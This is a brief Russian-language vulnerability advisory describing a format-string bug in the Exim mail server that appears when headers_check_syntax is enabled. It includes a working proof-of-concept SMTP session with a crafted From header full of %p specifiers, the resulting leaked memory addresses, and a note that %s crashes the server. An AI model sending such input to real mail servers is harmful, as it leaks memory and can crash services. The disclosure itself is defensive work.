Exim - это агент передачи сообщений (Message Transfert Agent) использующийся в UNIX системах подключенных к интернету. Уязвимость работает только при включенной опции headers_check_syntax (по умолчанию она отключена).

Exploit:

Делаем следующее:

lez:~$ /usr/sbin/exim -bS
mail from:lez@lez
rcpt to:hax0r@lez
data
From:@@%p%p%p%p%p%p%p%p%p%p

После этого, в ответе мы увидим:

550 Syntax error in 'From' header: domain missing or malformed: failing address is:
@@0x80beba00x804d2690x80be6600x80be6680x80bd050(nil)(nil)(nil)(nil)0x80b9d40

Если изменить %p's на %s, то получим ошибку segfault.

Для устранения не включайте опцию
headers_check_syntax.

Оставить мнение